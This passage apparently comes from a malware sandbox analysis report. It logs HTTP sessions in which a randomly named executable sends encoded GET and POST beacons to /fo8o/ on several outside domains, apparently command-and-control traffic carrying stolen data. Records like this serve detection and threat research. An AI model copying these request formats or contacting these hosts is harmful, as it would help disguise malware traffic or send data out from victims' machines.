                                          Data Ascii: elJtehkH=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8FxwN1gFMyxBM/tNPbBkWWg65rW9OhS47R+Iv/tlYxFS0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vMbwnt4DQqh8cNgsgk228k2L5PngYyoOdflnFrW7M3LcFPsxhRf+//D4dcTwaOVLhv3eCUZqpusHwyXPwgW6TuK70JeCi9ELbm/JHs5nEZNYt9gINRz/xk4saE+gyfNPVd3USkEHFWiwgLoCdyxMiCnCV8N7vp9jvHuYVFECizejIFUsj1L5awlRSArxkosu88jFosLjjCV7rQpRN0ORDusbVE2SNfVKz2OyNaNQdvD2CWu0KTn2b3qsWvBXgwId92/TbSN8occRSpiyYr1jezk5xorkS1szuFZ/RymGtg/8QkAbBDTGyV4RefsT9vhapIKaqQEEOoeKY/5ZP269UFz+h5ide/dT34BdS9mqqT2UIUly3+AMrUEY30rOFIix6vdECEKy5LB2rpiNOOSVaiXWCgixsCCORrIiVOr3P5e3OV9DPwPyAsbm89NL/G5GEi+zK+YkrbbMcdFfMu1NNykUJeOn8j6mvaCZ8viIlMthIq3jRhpa4WGktmqI9JGAiWfe3RTFf5UoLc/LRdG7NWrwQEHYRtULAb2RmPTJSIhRo3JF+TqzjwKDv6E6/m4JXZju0iG5ZlM4iBaYQ6BAN6HSGPTPiBOfNYSnFlpqkN5mTxHH3dRegdjc9HfvbUxICgg/Zv6i5Vjk5NQIjfwdN4cUtFDB6sbzMnctvq74A7LnkLpf6PVYILwp0uRFKRNJXdXxCqQHmxVOcJAofjqgMSHN/cmP/q8HxjOm4JN1IK4EIjTWH [TRUNCATED]
                                          Aug 30, 2024 09:42:31.150937080 CEST637INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:31 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.44976166.29.149.46803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:33.102448940 CEST509OUTGET /fo8o/?elJtehkH=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.techchains.info
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:42:33.713421106 CEST652INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:33 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html; charset=utf-8
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.449762195.110.124.133803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:38.820089102 CEST800OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.elettrosistemista.zip
                                          Origin: http://www.elettrosistemista.zip
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                          Data Ascii: elJtehkH=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
                                          Aug 30, 2024 09:42:39.502351046 CEST367INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:39 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.449763195.110.124.133803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:41.352644920 CEST820OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.elettrosistemista.zip
                                          Origin: http://www.elettrosistemista.zip
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d
                                          Data Ascii: elJtehkH=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
                                          Aug 30, 2024 09:42:42.035736084 CEST367INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:41 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.449764195.110.124.133803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:43.884783030 CEST10902OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.elettrosistemista.zip
                                          Origin: http://www.elettrosistemista.zip
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 10305
                                          Referer: http://www.elettrosistemista.zip/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 50 6f 6d 4c 43 66 2f 74 36 30 52 55 6f 71 73 39 59 75 51 4b 61 34 6f 35 70 72 44 76 4d 48 39 53 62 53 68 6a 65 48 2b 32 33 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 47 4c 61 4b 4e 65 70 57 45 41 32 2b 42 2b 44 43 52 31 73 43 35 72 75 62 64 54 48 39 48 45 6d 53 68 4b 67 37 75 52 70 75 59 43 72 6e 69 79 5a 4f 78 78 2b 66 77 38 68 64 6d 30 68 56 58 6f 4e 6d 78 71 49 59 47 2f 69 31 5a 34 2b 48 2f 6a [TRUNCATED]
                                          Data Ascii: elJtehkH=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWPomLCf/t60RUoqs9YuQKa4o5prDvMH9SbShjeH+23Z5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqGLaKNepWEA2+B+DCR1sC5rubdTH9HEmShKg7uRpuYCrniyZOxx+fw8hdm0hVXoNmxqIYG/i1Z4+H/juMFpdnN89VHxi9Jaw2sh9CJtt+C8Sr1Z+wRy6TYReB5ys/dgCKdsxeFltjZCAFlR5VrM/1wLjkKF7adGqPCLL0d6uoU+eDO0hvKYenTQgmZYHEe7+UHsu7TbsYxpgNn4i4AD48jePo5nIOTt5WZ8qQEK9l6v8jw+L3ZPIkNmIKTn8l0QHC66zVtxqxlwhPsJONRF5FAwRxuYLLuQ1AOQBB41G1JstARWEryL4EWLo8zBHXMNllACaAZFn5DU9b+ORBkDKjbAun2+jQdpx3k59oRagJTgQRC42PnmyV724DU3eHzPcw3jHkhDTBMUu50+QeZwRo8k7ZmO+LkzJBi9hX2cfvkbkEZd4sgtXZmtGbW7zV0o2kw2jakmpjgYjUGXpPQpEVV2MLERunr2S6kdI28PkpXxDFDpxI2ot5wnZD1uv/gRMCUeLXN8foAD2fi2+6XdpFXTlAb08OkXYVy3T2zFUJqP/ic/54OhEflwYIgGCNHa0xouhuieOTsEX53hl7k6RUj+gkXp5Cu3+MpVQV3aqO1ZUp9WF1xfNy1ZqrPB2m6U9YSJR1cNzgRyM7Vo3xo3OeObcpYXhPl0lUg0qc5YNT73BhEKXxkc/wP7N6sojl/DTcsdpZgnfc1gQI2iGwx8sfZCGdjOVKcvA0Br8ZGbFgYA1ebCJM [TRUNCATED]
                                          Aug 30, 2024 09:42:44.685038090 CEST367INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:44 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.449765195.110.124.133803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:46.418720007 CEST515OUTGET /fo8o/?elJtehkH=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&z8_=glwH5BKp HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Host: www.elettrosistemista.zip
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Aug 30, 2024 09:42:47.109494925 CEST367INHTTP/1.1 404 Not Found
                                          Date: Fri, 30 Aug 2024 07:42:47 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.44976615.197.240.20803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:52.158744097 CEST794OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.donnavariedades.com
                                          Origin: http://www.donnavariedades.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 205
                                          Referer: http://www.donnavariedades.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 62 42 73 39 30 37 2b 33 2b 78 67 59 66 32 35 64 57 64 39 4f 6f 30 58 47 74 78 2b 55 6b 6c 71 6f 51 3d 3d
                                          Data Ascii: elJtehkH=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDpbBs907+3+xgYf25dWd9Oo0XGtx+UklqoQ==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.44976715.197.240.20803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
                                          TimestampBytes transferredDirectionData
                                          Aug 30, 2024 09:42:54.698743105 CEST814OUTPOST /fo8o/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.donnavariedades.com
                                          Origin: http://www.donnavariedades.com
                                          Cache-Control: no-cache
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 225
                                          Referer: http://www.donnavariedades.com/fo8o/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                          Data Raw: 65 6c 4a 74 65 68 6b 48 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 51 6b 62 71 34 4b 5a 6e 59 6a 7a 52 65 71 67 6e 46 53 2b 47 2b 4f 6c 56 4a 33 44 74 42 46 38 58 55 3d
                                          Data Ascii: elJtehkH=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoQkbq4KZnYjzReqgnFS+G+OlVJ3DtBF8XU=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.44976815.197.240.20803164C:\Program Files (x86)\fqYQveWkZrbDifqWhVUXFYnzOPZnZwaGxgEupZiYnntGhIVrAxrDtRntVbKLEWbsmuLoiDaVmFlLY\XWXkhXRHcDkPdE.exe
